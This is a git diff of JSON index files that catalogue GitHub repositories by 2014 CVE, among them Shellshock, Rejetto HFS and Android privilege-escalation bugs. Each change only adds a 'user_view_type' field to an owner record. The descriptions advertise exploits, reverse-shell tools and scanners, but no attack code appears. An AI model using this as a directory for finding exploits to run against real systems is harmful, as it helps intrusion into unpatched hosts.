"https:\/\/avatars.githubusercontent.com\/u\/44183775?v=4", - "html_url": "https:\/\/github.com\/b4keSn4ke" + "html_url": "https:\/\/github.com\/b4keSn4ke", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/b4keSn4ke\/CVE-2014-6271", "description": "Shellshock exploit aka CVE-2014-6271", @@ -1800,7 +1859,8 @@ "login": "hadrian3689", "id": 71423134, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", - "html_url": "https:\/\/github.com\/hadrian3689" + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hadrian3689\/shellshock", "description": "CVE-2014-6271 Shellshock", @@ -1830,7 +1890,8 @@ "login": "akr3ch", "id": 97300177, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97300177?v=4", - "html_url": "https:\/\/github.com\/akr3ch" + "html_url": "https:\/\/github.com\/akr3ch", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/akr3ch\/CVE-2014-6271", "description": "ShellShock interactive-shell exploit", @@ -1864,7 +1925,8 @@ "login": "0xConstant", "id": 51972282, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", - "html_url": "https:\/\/github.com\/0xConstant" + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xConstant\/CVE-2014-6271", "description": null, @@ -1894,7 +1956,8 @@ "login": "Gurguii", "id": 101645735, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101645735?v=4", - "html_url": "https:\/\/github.com\/Gurguii" + "html_url": "https:\/\/github.com\/Gurguii", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Gurguii\/cgi-bin-shellshock", "description": "[Python\/Shell] - Tested in HackTheBox - Shocker (Easy) CVE-2014-6271", @@ -1924,7 +1987,8 @@ "login": "anujbhan", "id": 14915809, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14915809?v=4", - "html_url": "https:\/\/github.com\/anujbhan" + "html_url": "https:\/\/github.com\/anujbhan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/anujbhan\/shellshock-victim-host", "description": "A docker container vulnerable to Shellshock - CVE-2014-6271", @@ -1954,7 +2018,8 @@ "login": "FilipStudeny", "id": 81091191, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81091191?v=4", - "html_url": "https:\/\/github.com\/FilipStudeny" + "html_url": "https:\/\/github.com\/FilipStudeny", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/FilipStudeny\/-CVE-2014-6271-Shellshock-Remote-Command-Injection-", "description": "[CVE-2014-6271] Apache Shellshock Remote Command Injection tool for quick reverse shell and file browsing", @@ -1984,7 +2049,8 @@ "login": "mritunjay-k", "id": 41521418, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41521418?v=4", - "html_url": "https:\/\/github.com\/mritunjay-k" + "html_url": "https:\/\/github.com\/mritunjay-k", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mritunjay-k\/CVE-2014-6271", "description": null, @@ -2014,7 +2080,8 @@ "login": "Brandaoo", "id": 93392038, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93392038?v=4", - "html_url": "https:\/\/github.com\/Brandaoo" + "html_url": "https:\/\/github.com\/Brandaoo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Brandaoo\/CVE-2014-6271", "description": null, @@ -2044,7 +2111,8 @@ "login": "Jsmoreira02", "id": 103542430, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103542430?v=4", - "html_url": "https:\/\/github.com\/Jsmoreira02" + "html_url": "https:\/\/github.com\/Jsmoreira02", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Jsmoreira02\/CVE-2014-6271", "description": "Exploitation of \"Shellshock\" Vulnerability. Remote code execution in Apache with mod_cgi", @@ -2082,7 +2150,8 @@ "login": "hanmin0512", "id": 37041208, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37041208?v=4", - "html_url": "https:\/\/github.com\/hanmin0512" + "html_url": "https:\/\/github.com\/hanmin0512", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hanmin0512\/CVE-2014-6271_pwnable", "description": null, @@ -2112,7 +2181,8 @@ "login": "0xTabun", "id": 144548207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144548207?v=4", - "html_url": "https:\/\/github.com\/0xTabun" + "html_url": "https:\/\/github.com\/0xTabun", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xTabun\/CVE-2014-6271", "description": "Shellshock vulnerability reverse shell", @@ -2142,7 +2212,8 @@ "login": "0xN7y", "id": 70061541, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70061541?v=4", - "html_url": "https:\/\/github.com\/0xN7y" + "html_url": "https:\/\/github.com\/0xN7y", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xN7y\/CVE-2014-6271", "description": "EXPLOIT FOR CVE-2014-6271", @@ -2172,7 +2243,8 @@ "login": "MY7H404", "id": 100413372, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413372?v=4", - "html_url": "https:\/\/github.com\/MY7H404" + "html_url": "https:\/\/github.com\/MY7H404", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MY7H404\/CVE-2014-6271-Shellshock", "description": "The Shellshock Exploit is a tool designed to efficiently exploit the Shellshock vulnerability (CVE-2014-6271) in susceptible CGI servers, enabling a precise takeover of the target server. Shellshock is a critical security vulnerability that affects the Bash shell, allowing attackers to execute arbitrary commands on the targeted system", @@ -2207,7 +2279,8 @@ "login": "AlissonFaoli", "id": 129133392, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129133392?v=4", - "html_url": "https:\/\/github.com\/AlissonFaoli" + "html_url": "https:\/\/github.com\/AlissonFaoli", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AlissonFaoli\/Shellshock", "description": "Shellshock exploit (CVE-2014-6271)", @@ -2237,7 +2310,8 @@ "login": "hackintoanetwork", "id": 83481196, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83481196?v=4", - "html_url": "https:\/\/github.com\/hackintoanetwork" + "html_url": "https:\/\/github.com\/hackintoanetwork", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hackintoanetwork\/shellshock", "description": "Python3 Shellshock (CVE-2014-6271) Scanner", @@ -2267,7 +2341,8 @@ "login": "ajansha", "id": 68161367, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68161367?v=4", - "html_url": "https:\/\/github.com\/ajansha" + "html_url": "https:\/\/github.com\/ajansha", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ajansha\/shellshock", "description": "Shelly is a lightweight and efficient vulnerability scanner designed to identify and mitigate Shellshock (CVE-2014-6271 & CVE-2014-7169) vulnerabilities in Bash environments.", @@ -2305,7 +2380,8 @@ "login": "K3ysTr0K3R", "id": 70909693, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", - "html_url": "https:\/\/github.com\/K3ysTr0K3R" + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2014-6271-EXPLOIT", "description": "A PoC exploit for CVE-2014-6271 - Shellshock", @@ -2352,7 +2428,8 @@ "login": "TheRealCiscoo", "id": 159902776, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159902776?v=4", - "html_url": "https:\/\/github.com\/TheRealCiscoo" + "html_url": "https:\/\/github.com\/TheRealCiscoo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/TheRealCiscoo\/Shellshock-Exploit", "description": "Exploit para abusar de la vulnerabilidad Shellshock (CVE-2014-6271).", diff --git a/2014/CVE-2014-6287.json b/2014/CVE-2014-6287.json index a90bf996ee..546c3d0462 100644 --- a/2014/CVE-2014-6287.json +++ b/2014/CVE-2014-6287.json @@ -7,7 +7,8 @@ "login": "roughiz", "id": 9005615, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9005615?v=4", - "html_url": "https:\/\/github.com\/roughiz" + "html_url": "https:\/\/github.com\/roughiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/roughiz\/cve-2014-6287.py", "description": "HttpFileServer httpd 2.3", @@ -37,7 +38,8 @@ "login": "Nicoslo", "id": 64541498, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64541498?v=4", - "html_url": "https:\/\/github.com\/Nicoslo" + "html_url": "https:\/\/github.com\/Nicoslo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Nicoslo\/Windows-exploitation-Rejetto-HTTP-File-Server-HFS-2.3.x-CVE-2014-6287", "description": null, @@ -67,7 +69,8 @@ "login": "wizardy0ga", "id": 90923369, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90923369?v=4", - "html_url": "https:\/\/github.com\/wizardy0ga" + "html_url": "https:\/\/github.com\/wizardy0ga", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wizardy0ga\/THM-Steel_Mountain-CVE-2014-6287", "description": "A write up on the Steel Mountain box from TryHackMe.com and exploit for CVE-2014-6287", @@ -97,7 +100,8 @@ "login": "mrintern", "id": 24460340, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24460340?v=4", - "html_url": "https:\/\/github.com\/mrintern" + "html_url": "https:\/\/github.com\/mrintern", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mrintern\/thm_steelmountain_CVE-2014-6287", "description": "a python3 version of the exploit written for CVE-2014-6287. Useful for completing the \"Steel Mountain\" room on TryHackMe.com without the use of metasploit.", @@ -127,7 +131,8 @@ "login": "hadrian3689", "id": 71423134, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", - "html_url": "https:\/\/github.com\/hadrian3689" + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hadrian3689\/rejetto_hfs_rce", "description": "CVE-2014-6287 Rejetto HFS 2.3", @@ -157,7 +162,8 @@ "login": "randallbanner", "id": 99814847, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99814847?v=4", - "html_url": "https:\/\/github.com\/randallbanner" + "html_url": "https:\/\/github.com\/randallbanner", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/randallbanner\/Rejetto-HTTP-File-Server-HFS-2.3.x---Remote-Command-Execution", "description": "CVE-2014-6287", @@ -187,7 +193,8 @@ "login": "0xTabun", "id": 144548207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144548207?v=4", - "html_url": "https:\/\/github.com\/0xTabun" + "html_url": "https:\/\/github.com\/0xTabun", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xTabun\/CVE-2014-6287", "description": "Rejetto http File Server 2.3.x (Reverse shell)", @@ -217,7 +224,8 @@ "login": "zhsh9", "id": 78374754, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78374754?v=4", - "html_url": "https:\/\/github.com\/zhsh9" + "html_url": "https:\/\/github.com\/zhsh9", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zhsh9\/CVE-2014-6287", "description": "Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c", diff --git a/2014/CVE-2014-6332.json b/2014/CVE-2014-6332.json index cf4f489f2d..069772251a 100644 --- a/2014/CVE-2014-6332.json +++ b/2014/CVE-2014-6332.json @@ -7,7 +7,8 @@ "login": "MarkoArmitage", "id": 9991392, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9991392?v=4", - "html_url": "https:\/\/github.com\/MarkoArmitage" + "html_url": "https:\/\/github.com\/MarkoArmitage", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MarkoArmitage\/metasploit-framework", "description": " app \tturn nil publics and privates into blanks \t3 months ago \tconfig \tUse bundler\/setup for more graceful bundler related failures \t11 days ago \tdata \tAdd token fiddling from nishang \t12 hours ago \tdb \tRevert \"Diff triggering comment\" \t12 days ago \tdocumentation \tSwitch to Msf::OperatingSystems::Match::WINDOWS \t2 months ago \texternal \tUse PDWORD_PTR and DWORD_PTR \t29 days ago \tfeatures \tUp aruba timeout for simplecov overhead \t4 days ago \tlib \tCheck for load errors in reload_all \t4 days ago \tmodules \tLand #4255 - CVE-2014-6332 Internet Explorer \t19 hours ago \tplugins \tLand #3588, @tobd-r7's Fix SpaceBeforeModifierKeyword Rubocop warning \t4 months ago \tscript \trails generate cucumber:install \t3 months ago \tscripts \tdelete the old script \ta month ago \tspec \tRemove debug file writes \t2 days ago \ttest \tFix up comment splats with the correct URI \ta month ago \ttools \tFix bugs \t24 days ago \t.gitignore \tAdd note about rbenv for rvm .versions.conf local override \t24 days ago \t.gitmodules \tAdd RDI submodule, port Kitrap0d \ta year ago \t.mailmap \tAdd @trosen-r7's alias for commits \t6 months ago \t.rspec \tAdd modern --require to .rspec \t2 months ago \t.rubocop.yml \tReapply PR #4113 (removed via #4175) \t18 days ago \t.ruby-gemset \tRestoring ruby and gemset files \t6 months ago \t.ruby-version \tOh good, another Ruby version bump \t14 days ago \t.simplecov \tRemove fastlib \t2 months ago \t.travis.yml \tEnable fast_finish on travis-ci \t12 days ago \t.yardopts \tVarious merge resolutions from master <- staging \t4 months ago \tCONTRIBUTING.md \tAdd a don't to CONTRIBUTING about merge messages \t11 days ago \tCOPYING \tWith 66 days left in 2014, may as well update \ta month ago \tGemfile \tmetasploit-credential bump to 0.13.3 \t16 days ago \tGemfile.local.example \tVarious merge resolutions from master <- staging \t4 months ago \tGemfile.lock \tBump mdm version number \t12 days ago \tHACKING \tUpdate link for The Metasploit Development Environment \t5 months ago \tLICENSE \tRemove fastlib \t2 months ago \tREADME.md \tEncourage use of the installer for users. \t8 months ago \tRakefile \tMerge branch 'feature\/MSP-11130\/metasploit-framework-spec-constants' … \t24 days ago \tmetasploit-framework-db.gemspec \tmetasploit-credential bump to 0.13.3 \t16 days ago \tmetasploit-framework-full.gemspec \tUpdate metasploit-framework-full.gemspec \t23 days ago \tmetasploit-framework-pcap.gemspec \tDepend on metasloit-framework in optional gemspecs \t24 days ago \tmetasploit-framework.gemspec \tUpdate meterpreter_bins to 0.0.11 \t18 days ago \tmsfbinscan \tRemove fastlib \t2 months ago \tmsfcli \tFix thread-leaks in msfcli spec \t17 days ago \tmsfconsole \t@wvu-r7 is a skilled negotiator. s\/stdout\/stderr\/ \ta month ago \tmsfd \tRemove fastlib \t2 months ago \tmsfelfscan \tRemove fastlib \t2 months ago \tmsfencode \tRemove fastlib \t2 months ago \tmsfmachscan \tRemove fastlib \t2 months ago \tmsfpayload \tfixes merge conflicts msfpayload & exe \ta month ago \tmsfpescan \tRemove fastlib \t2 months ago \tmsfrop \tRemove fastlib \t2 months ago \tmsfrpc \tRemove fastlib \t2 months ago \tmsfrpcd \tRemove call to legacy db.sink queue, closes #4244 \t7 days ago \tmsfupdate \tAlways use maybe_wait_and_exit in msfupdate \ta year ago \tmsfvenom \tFix #4047 - undefined method `rank' due to an invalid encoder name \t19 days ago README.md ", @@ -37,7 +38,8 @@ "login": "tjjh89017", "id": 2821179, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2821179?v=4", - "html_url": "https:\/\/github.com\/tjjh89017" + "html_url": "https:\/\/github.com\/tjjh89017", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tjjh89017\/cve-2014-6332", "description": null, @@ -67,7 +69,8 @@ "login": "mourr", "id": 15272257, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15272257?v=4", - "html_url": "https:\/\/github.com\/mourr" + "html_url": "https:\/\/github.com\/mourr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mourr\/CVE-2014-6332", "description": "CVE-2014-6332 ZeroDay POC - Starts PowerShell", diff --git a/2014/CVE-2014-6577.json b/2014/CVE-2014-6577.json index 2c0791886f..b60fe8cf92 100644 --- a/2014/CVE-2014-6577.json +++ b/2014/CVE-2014-6577.json @@ -7,7 +7,8 @@ "login": "SecurityArtWork", "id": 14791053, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14791053?v=4", - "html_url": "https:\/\/github.com\/SecurityArtWork" + "html_url": "https:\/\/github.com\/SecurityArtWork", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SecurityArtWork\/oracle-xxe-sqli", "description": " Automated Oracle CVE-2014-6577 exploitation via SQLi", diff --git a/2014/CVE-2014-6598.json b/2014/CVE-2014-6598.json index 2c95c74e07..1f2436ce5b 100644 --- a/2014/CVE-2014-6598.json +++ b/2014/CVE-2014-6598.json @@ -7,7 +7,8 @@ "login": "KPN-CISO", "id": 6069290, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6069290?v=4", - "html_url": "https:\/\/github.com\/KPN-CISO" + "html_url": "https:\/\/github.com\/KPN-CISO", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/KPN-CISO\/DRA_writeup", "description": "Writeup of the Oracle DSR stack buffer overflow vulnerability (DRA) CVE-2014-6598", diff --git a/2014/CVE-2014-6721.json b/2014/CVE-2014-6721.json index 5855eb4273..f5d967427e 100644 --- a/2014/CVE-2014-6721.json +++ b/2014/CVE-2014-6721.json @@ -7,7 +7,8 @@ "login": "sagisar1", "id": 134386410, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134386410?v=4", - "html_url": "https:\/\/github.com\/sagisar1" + "html_url": "https:\/\/github.com\/sagisar1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sagisar1\/CVE-2014-6721-exploit-Shellshock", "description": "exploit of the Shellshock vulnerability", diff --git a/2014/CVE-2014-7169.json b/2014/CVE-2014-7169.json index c0a19a4919..c55736ba70 100644 --- a/2014/CVE-2014-7169.json +++ b/2014/CVE-2014-7169.json @@ -7,7 +7,8 @@ "login": "chef-boneyard", "id": 20840233, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20840233?v=4", - "html_url": "https:\/\/github.com\/chef-boneyard" + "html_url": "https:\/\/github.com\/chef-boneyard", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/chef-boneyard\/bash-shellshock", "description": "DEPRECATED: Chef cookbook to audit & remediate \"Shellshock\" (BASH-CVE-2014-7169)", @@ -37,7 +38,8 @@ "login": "gina-alaska", "id": 326968, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/326968?v=4", - "html_url": "https:\/\/github.com\/gina-alaska" + "html_url": "https:\/\/github.com\/gina-alaska", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gina-alaska\/bash-cve-2014-7169-cookbook", "description": null, @@ -67,7 +69,8 @@ "login": "Gobinath-B", "id": 81898167, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81898167?v=4", - "html_url": "https:\/\/github.com\/Gobinath-B" + "html_url": "https:\/\/github.com\/Gobinath-B", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Gobinath-B\/SHELL-SCHOCK", "description": "CVE-2014-7169 Shell Shock", diff --git a/2014/CVE-2014-7205.json b/2014/CVE-2014-7205.json index b3c2f9d61d..261b719e22 100644 --- a/2014/CVE-2014-7205.json +++ b/2014/CVE-2014-7205.json @@ -7,7 +7,8 @@ "login": "maximilianmarx", "id": 49280556, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49280556?v=4", - "html_url": "https:\/\/github.com\/maximilianmarx" + "html_url": "https:\/\/github.com\/maximilianmarx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/maximilianmarx\/bassmaster-rce", "description": "Exploiting CVE-2014-7205 by injecting arbitrary JavaScript resulting in Remote Code Execution.", @@ -37,7 +38,8 @@ "login": "AndrewTrube", "id": 53106750, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53106750?v=4", - "html_url": "https:\/\/github.com\/AndrewTrube" + "html_url": "https:\/\/github.com\/AndrewTrube", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/AndrewTrube\/CVE-2014-7205", "description": "Bassmaster Plugin NodeJS RCE", diff --git a/2014/CVE-2014-7236.json b/2014/CVE-2014-7236.json index 9541907f64..50f596896d 100644 --- a/2014/CVE-2014-7236.json +++ b/2014/CVE-2014-7236.json @@ -7,7 +7,8 @@ "login": "m0nad", "id": 772792, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/772792?v=4", - "html_url": "https:\/\/github.com\/m0nad" + "html_url": "https:\/\/github.com\/m0nad", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/m0nad\/CVE-2014-7236_Exploit", "description": "Exploit for CVE-2014-7236", diff --git a/2014/CVE-2014-7911.json b/2014/CVE-2014-7911.json index e78fd47f18..d05b36ed1a 100644 --- a/2014/CVE-2014-7911.json +++ b/2014/CVE-2014-7911.json @@ -7,7 +7,8 @@ "login": "retme7", "id": 5284280, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5284280?v=4", - "html_url": "https:\/\/github.com\/retme7" + "html_url": "https:\/\/github.com\/retme7", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/retme7\/CVE-2014-7911_poc", "description": "Local root exploit for Nexus5 Android 4.4.4(KTU84P)", @@ -37,7 +38,8 @@ "login": "ele7enxxh", "id": 9476237, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9476237?v=4", - "html_url": "https:\/\/github.com\/ele7enxxh" + "html_url": "https:\/\/github.com\/ele7enxxh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ele7enxxh\/CVE-2014-7911", "description": null, @@ -67,7 +69,8 @@ "login": "heeeeen", "id": 1645206, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1645206?v=4", - "html_url": "https:\/\/github.com\/heeeeen" + "html_url": "https:\/\/github.com\/heeeeen", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/heeeeen\/CVE-2014-7911poc", "description": null, @@ -97,7 +100,8 @@ "login": "GeneBlue", "id": 10919709, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10919709?v=4", - "html_url": "https:\/\/github.com\/GeneBlue" + "html_url": "https:\/\/github.com\/GeneBlue", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GeneBlue\/cve-2014-7911-exp", "description": "exploit for cve-2014-7911; android; java deserialization ;system privilege;ace;", @@ -127,7 +131,8 @@ "login": "koozxcv", "id": 15362158, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15362158?v=4", - "html_url": "https:\/\/github.com\/koozxcv" + "html_url": "https:\/\/github.com\/koozxcv", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/koozxcv\/CVE-2014-7911", "description": "vulnerabilities‘ Poc and Exploit", @@ -157,7 +162,8 @@ "login": "koozxcv", "id": 15362158, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15362158?v=4", - "html_url": "https:\/\/github.com\/koozxcv" + "html_url": "https:\/\/github.com\/koozxcv", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/koozxcv\/CVE-2014-7911-CVE-2014-4322_get_root_privilege", "description": "CVE-2014-7911 vulnerability and CVE-2014-4322 vulnerability to get root privilege!", @@ -187,7 +193,8 @@ "login": "mabin004", "id": 5842189, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5842189?v=4", - "html_url": "https:\/\/github.com\/mabin004" + "html_url": "https:\/\/github.com\/mabin004", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mabin004\/cve-2014-7911", "description": "exp for cve-2014-7911 which can get system privillage", diff --git a/2014/CVE-2014-7920.json b/2014/CVE-2014-7920.json index 6f48481fa1..a427118e96 100644 --- a/2014/CVE-2014-7920.json +++ b/2014/CVE-2014-7920.json @@ -7,7 +7,8 @@ "login": "laginimaineb", "id": 11378334, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11378334?v=4", - "html_url": "https:\/\/github.com\/laginimaineb" + "html_url": "https:\/\/github.com\/laginimaineb", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/laginimaineb\/cve-2014-7920-7921", "description": "Exploit code for CVE-2014-7920 and CVE-2014-7921 - code-exec in mediaserver up to Android 5.1", @@ -37,7 +38,8 @@ "login": "Vinc3nt4H", "id": 14606316, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14606316?v=4", - "html_url": "https:\/\/github.com\/Vinc3nt4H" + "html_url": "https:\/\/github.com\/Vinc3nt4H", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Vinc3nt4H\/cve-2014-7920-7921_update", "description": "cve-2014-7920-7921 exploit update", diff --git a/2014/CVE-2014-8110.json b/2014/CVE-2014-8110.json index 42b1409994..f261bb442f 100644 --- a/2014/CVE-2014-8110.json +++ b/2014/CVE-2014-8110.json @@ -7,7 +7,8 @@ "login": "tafamace", "id": 45160113, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", - "html_url": "https:\/\/github.com\/tafamace" + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tafamace\/CVE-2014-8110", "description": null, diff --git a/2014/CVE-2014-8142.json b/2014/CVE-2014-8142.json index ce13ae058b..64a7691673 100644 --- a/2014/CVE-2014-8142.json +++ b/2014/CVE-2014-8142.json @@ -7,7 +7,8 @@ "login": "3xp10it", "id": 15134333, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15134333?v=4", - "html_url": "https:\/\/github.com\/3xp10it" + "html_url": "https:\/\/github.com\/3xp10it", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/3xp10it\/php_cve-2014-8142_cve-2015-0231", "description": "php_cve-2014-8142_cve-2015-0231的漏洞环境docker", diff --git a/2014/CVE-2014-8244.json b/2014/CVE-2014-8244.json index 2923b8c19e..c54f2fdd44 100644 --- a/2014/CVE-2014-8244.json +++ b/2014/CVE-2014-8244.json @@ -7,7 +7,8 @@ "login": "JollyJumbuckk", "id": 34014601, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34014601?v=4", - "html_url": "https:\/\/github.com\/JollyJumbuckk" + "html_url": "https:\/\/github.com\/JollyJumbuckk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JollyJumbuckk\/LinksysLeaks", "description": "Python3 script to scan for Linksys smart wifi devices that are vulnerable to CVE-2014-8244", diff --git a/2014/CVE-2014-8275.json b/2014/CVE-2014-8275.json index 58300366d7..142b655b8c 100644 --- a/2014/CVE-2014-8275.json +++ b/2014/CVE-2014-8275.json @@ -7,7 +7,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/Openssl_G2.5_CVE-2014-8275", "description": null, @@ -37,7 +38,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/CVE-2014-8275_openssl_g2.5", "description": null, diff --git a/2014/CVE-2014-8609.json b/2014/CVE-2014-8609.json index 3fbc9e4b80..8c161be4c6 100644 --- a/2014/CVE-2014-8609.json +++ b/2014/CVE-2014-8609.json @@ -7,7 +7,8 @@ "login": "locisvv", "id": 1533289, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1533289?v=4", - "html_url": "https:\/\/github.com\/locisvv" + "html_url": "https:\/\/github.com\/locisvv", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/locisvv\/Vulnerable-CVE-2014-8609", "description": null, @@ -37,7 +38,8 @@ "login": "MazX0p", "id": 54814433, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54814433?v=4", - "html_url": "https:\/\/github.com\/MazX0p" + "html_url": "https:\/\/github.com\/MazX0p", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MazX0p\/CVE-2014-8609-POC", "description": "pendingintent vulnerability", @@ -67,7 +69,8 @@ "login": "ratiros01", "id": 14090955, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14090955?v=4", - "html_url": "https:\/\/github.com\/ratiros01" + "html_url": "https:\/\/github.com\/ratiros01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ratiros01\/CVE-2014-8609-exploit", "description": null, diff --git a/2014/CVE-2014-8682.json b/2014/CVE-2014-8682.json index 9dc3db8f41..4564b00bba 100644 --- a/2014/CVE-2014-8682.json +++ b/2014/CVE-2014-8682.json @@ -7,7 +7,8 @@ "login": "nihal1306", "id": 6605890, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6605890?v=4", - "html_url": "https:\/\/github.com\/nihal1306" + "html_url": "https:\/\/github.com\/nihal1306", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nihal1306\/gogs", "description": "CVE-2014-8682", diff --git a/2014/CVE-2014-8729.json b/2014/CVE-2014-8729.json index 555436c097..a408ac2d3b 100644 --- a/2014/CVE-2014-8729.json +++ b/2014/CVE-2014-8729.json @@ -7,7 +7,8 @@ "login": "inso-", "id": 6376377, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6376377?v=4", - "html_url": "https:\/\/github.com\/inso-" + "html_url": "https:\/\/github.com\/inso-", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/inso-\/TORQUE-Resource-Manager-2.5.x-2.5.13-stack-based-buffer-overflow-exploit-CVE-2014-8729-CVE-2014-878", "description": "TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow exploit CVE-2014-8729; CVE-2014-878", diff --git 